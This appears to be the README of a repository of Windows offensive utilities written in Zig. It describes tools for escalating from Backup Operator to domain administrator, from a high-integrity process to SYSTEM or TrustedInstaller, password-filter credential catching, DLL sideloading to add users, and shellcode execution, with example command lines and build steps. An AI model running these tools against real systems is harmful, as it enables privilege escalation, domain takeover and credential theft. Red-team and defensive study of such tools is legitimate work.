An example of adding a user with a DLL (sideload it).
As the name implies - with the right group / privileges - "there be dragons".
# Dump workgroup box
.\BackupOperatorToDomainAdministrator.exe HOSTNAME/user:password@HOSTNAME \\HOSTNAME\share\
# Dump domain box
.\BackupOperatorToDomainAdministrator.exe DOMAIN/user:password@ip \\HOSTNAME\share\Provided a process in a 'high' context - leverage that to obtain SYSTEM.
.\HighToSystem.exe <pid> <fullpath to an executable>
Provided a process in a 'high' context - leverage that to obtain Trusted Installer.
.\HighToTrustedInstaller.exe <pid> <TI pid> <fullpath to an executable>
Call minidump on a PID.
Modify a processes privileges (enable/disable/remove)
# Enable all privileges to the current terminal
.\ModifyPrivilege.exe 0
# Enable all privilges on this PID
.\ModifyPrivilege.exe <some pid>An open source alternative to ntrights.exe to allow manipulation of LSA policy on windows.
An example password filter (DLL) with catcher (if desired)
An example usage for the SeRelabel privilege.
Execute code in other sessions (spawns powershell).
With a msfvenom payload; example of shellcode execution on both Windows and Linux.
Provided a quick utility to create shortcuts from the command line.
.\Shortcut.exe C:\windows\system32\cmd.exe C:\users\username\desktop\cmd.lnk C:\
git clone git@github.com:ArchiMoebius/zig-win32-utilities.git --recurse-submodules
# - OR -
git clone https://github.com/ArchiMoebius/zig-win32-utilities.git --recurse-submodulesVisit webinstall or just
curl -sS https://webi.sh/zig | sh
source ~/.config/envman/PATH.envThe above Creates ~/.local/opt/zig
Visit Zig and download / extract the most recent tagged version.
Creates those *.exe files.
make
tree zig-outCreates those *.exe and *.pdb files.
make debug
tree zig-out